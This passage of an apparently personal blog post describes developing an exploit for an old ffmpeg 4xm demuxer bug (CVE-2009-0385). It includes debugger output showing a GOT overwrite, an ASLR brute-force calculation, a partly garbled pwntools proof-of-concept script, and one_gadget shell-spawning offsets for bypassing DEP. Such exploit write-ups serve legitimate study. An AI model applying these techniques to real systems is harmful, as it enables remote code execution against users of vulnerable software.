[#3] 0x807b335 → Name: opt_input_file(filename=<optimized out>)
[#4] 0x807c983 → Name: parse_options(argc=0x3, argv=0xffffd584, options=0x83f5560 <options>, parse_arg_function=0x807a3e0 <opt_output_file>)
[#5] 0x8073326 → Name: main(argc=0x3, argv=0xffffd584)
gef➤  enable 6
gef➤  c

Breakpoint 6, 0x083f073e in av_malloc (size=0x164) at libavutil/mem.c:62
62      libavutil/mem.c: No such file or directory.
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────[ registers ]────
$eax   : 0xffffd15c  →  0x00000000
$ebx   : 0x00000000
$ecx   : 0x00000010
$edx   : 0xc213bc4d
$esp   : 0xffffd140  →  0xffffd15c  →  0x00000000
$ebp   : 0x8d3725a9
$esi   : 0x00000164
$edi   : 0x088263c0  →  0x00000280
$eip   : 0x083f073e  →  <av_mallocz+46> call 0x805b910 <posix_memalign@plt>
$eflags: [CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$ds: 0x002b  $ss: 0x002b  $fs: 0x0000  $es: 0x002b  $gs: 0x0063  $cs: 0x0023
───────────────────────────────────────────────────────────[ stack ]────
0xffffd140│+0x00: 0xffffd15c  →  0x00000000      ← $esp
0xffffd144│+0x04: 0x00000010
0xffffd148│+0x08: 0x00000164
0xffffd14c│+0x0c: 0x00000010
0xffffd150│+0x10: 0x08826400  →  "LISTt"
0xffffd154│+0x14: 0x088263c0  →  0x00000280
0xffffd158│+0x18: 0x088268a0  →  0x08407a40  →  0x084069a0  →  "AVCodecContext"
0xffffd15c│+0x1c: 0x00000000     ← $eax
───────────────────────────────────────────────────────[ code:i386 ]────
    0x83f072f <av_mallocz+31>  mov    DWORD PTR [esp+0x8], esi
    0x83f0733 <av_mallocz+35>  mov    DWORD PTR [esp+0x4], 0x10
    0x83f073b <av_mallocz+43>  mov    DWORD PTR [esp], eax
 →  0x83f073e <av_mallocz+46>  call   0x805b910 <posix_memalign@plt>
   ↳   0x805b910 <posix_memalign@plt+0> jmp    DWORD PTR ds:0x84ef134
       0x805b916 <posix_memalign@plt+6> push   0x250
       0x805b91b <posix_memalign@plt+11> jmp    0x805b460
       0x805b920 <fcntl@plt+0>    jmp    DWORD PTR ds:0x84ef138
       0x805b926 <fcntl@plt+6>    push   0x258
       0x805b92b <fcntl@plt+11>   jmp    0x805b460
─────────────────────────────────────────────[ arguments (guessed) ]────
posix_memalign@plt (
   [sp + 0x0] = 0x00000010,
   [sp + 0x4] = 0x00000164,
   [sp + 0x8] = 0x00000010
─────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "ffmpeg", stopped, reason: BREAKPOINT
───────────────────────────────────────────────────────────[ trace ]────
[#0] 0x83f073e → Name: av_malloc(size=0x164)
[#1] 0x83f073e → Name: av_mallocz(size=0x164)
[#2] 0x8087f60 → Name: av_new_stream(s=0x881d330, id=0x8d3725a9)
[#3] 0x80aaf22 → Name: fourxm_read_header(s=0x881d330, ap=0xffffd350)
[#4] 0x8083069 → Name: av_open_input_stream(ic_ptr=0xffffd34c, pb=0x8826340, filename=0xffffd70f "dracula.4xm", fmt=0x84f0fe0 <fourxm_demuxer>, ap=0xffffd350)
[#5] 0x808b0d4 → Name: av_open_input_file(ic_ptr=0xffffd34c, filename=0xffffd70f "dracula.4xm", fmt=0x84f0fe0 <fourxm_demuxer>, buf_size=0x0, ap=0xffffd350)
[#6] 0x807b335 → Name: opt_input_file(filename=<optimized out>)
[#7] 0x807c983 → Name: parse_options(argc=0x3, argv=0xffffd584, options=0x83f5560 <options>, parse_arg_function=0x807a3e0 <opt_output_file>)
[#8] 0x8073326 → Name: main(argc=0x3, argv=0xffffd584)
gef➤  x/xw 0x84ef134
0x84ef134 <posix_memalign@got.plt>:     0xffffffff

Great! Looks like we’ve confirmed that we can alter code execution. Now let’s try and pop a shell while bypassing DEP and ASLR!

Bypassing ASLR

There are a few well known ways to bypass ASLR including information leaks and with 32 bit binaries; brute force. The number of random bits in a 32 bit address space on Ubuntu 16.04 can be calculated as follows:

0xf7da4000 0xf7f54000 0x00000000 r-x /lib/i386-linux-gnu/libc-2.23.so

0xf7d23000 0xf7ed3000 0x00000000 r-x /lib/i386-linux-gnu/libc-2.23.so

0xf7cdd000 0xf7e8d000 0x00000000 r-x /lib/i386-linux-gnu/libc-2.23.so

0xf7d3e000 0xf7eee000 0x00000000 r-x /lib/i386-linux-gnu/libc-2.23.so

gef➤  p/t 0xf7cdd000
$1 = 11110111110011011101000000000000
gef➤  p/t 0xf7d23000
$2 = 11110111110100100011000000000000
gef➤  p/t 0xf7da4000
$3 = 11110111110110100100000000000000
gef➤  p/t 0xf7d3e000
$4 = 11110111110100111110000000000000

There are 9 random bit, if my math is correct (9! / (9 - 2)!): i’d have a 1/72 chance of guessing correctly. Here’s my proof of concept code:

# ffmpeg null ptr deref
# cve-2009-0385
# clampz
# a bug hunter's diary : trapkit.de

from pwn import *
import sys
import random

def randlibc():
    prefix = '11110111110'
    suffix = '000000000000'
    mid = ''
    for i in range(0, 9):
        mid += str( random.randint(0, 1) )
    return int(prefix+mid+suffix,2)

ffmpeg_path = './i686/ffmpeg/ffmpeg'

pwned = False

p = log.progress('ASLR bruteforcing: no match yet! fishsticks..')
while pwned != True:
    libc_base_guess = randlibc()
    f = open('./dracula.4xm', 'w')


    #import pdb; pdb.set_trace()
    r = context.log_level
    context.log_level = logging.CRITICAL
    io = process([ffmpeg_path, '-i', './dracula.4xm'])
    libc_base = io.libs()['/lib/i386-linux-gnu/libc.so.6']
    if hex(libc_base_guess) == hex(libc_base):
        context.log_level = logging.INFO
        log.success('got a match! {} == {}'.format(hex(libc_base_guess), hex(libc_base)))
        #log.failure('no match! {} != {}'.format(hex(io.libs()['/lib/i386-linux-gnu/libc.so.6']), hex(libc_base)))
        b = io.recv()
        if 'Unknown format' in b:
    except EOFError:
#context.log_level = r
if context.log_level == logging.CRITICAL:

Bypassing DEP

Probably for the worse, I didnt’t spend any time researching other bugs I could chain together with this one, I decided to attempt to simply return to the one shot gadget, however i searched all of the calls to potential functions whose GOT table entries I could overwrite (ones who would be called between the time of our write bug being triggered and the time of our program exit) and none were viable.

There are certain pre-requirements for using the one shot gadgets as shown below:

one_gadget libc.so.6 -l 1                                                                                                             ryuk@shinigami-mansion
0x3ac5c execve("/bin/sh", esp+0x28, environ)
  esi is the GOT address of libc
  [esp+0x28] == NULL

0x3ac5e execve("/bin/sh", esp+0x2c, environ)
  esi is the GOT address of libc
  [esp+0x2c] == NULL

0x3ac62 execve("/bin/sh", esp+0x30, environ)
  esi is the GOT address of libc
  [esp+0x30] == NULL

0x3ac69 execve("/bin/sh", esp+0x34, environ)
  esi is the GOT address of libc
  [esp+0x34] == NULL

0x3ac8c execve("/bin/sh", eax, [esp])
  esi is the GOT address of libc
  [eax] == NULL || eax == NULL
  [[esp]] == NULL || [esp] == NULL

0x3ac8d execve("/bin/sh", [esp], [esp+0x4])
  esi is the GOT address of libc
  [[esp]] == NULL || [esp] == NULL
  [[esp+0x4]] == NULL || [esp+0x4] == NULL

0x5fbc5 execl("/bin/sh", eax)
  esi is the GOT address of libc
  eax == NULL

0x5fbc6 execl("/bin/sh", [esp])
  esi is the GOT address of libc
  [esp] == NULL

Perhaps I did not look well enough - one idea I just had is perhaps I can cross-reference the output of ltrace to ensure that I covered all of my bases when looking for potential GOT entries to overwrite whos calls might fit the pre-requrements desired by one of the one-shot gadgets. Here is a list of the functions I looked at overwriting the GOT entries for:


Let me know if you happen to have any ideas! In particular I’d be curious if you know of some other bug I could chain together with this one in order to more eloquently bypass DEP, or if you have any ideas for a way to chain together more than 1 gadget using only this bug! Let’s work together to write a cool exploit :)

Next blog entry will outline my first exploration finding a security related bug of my own in an open source project!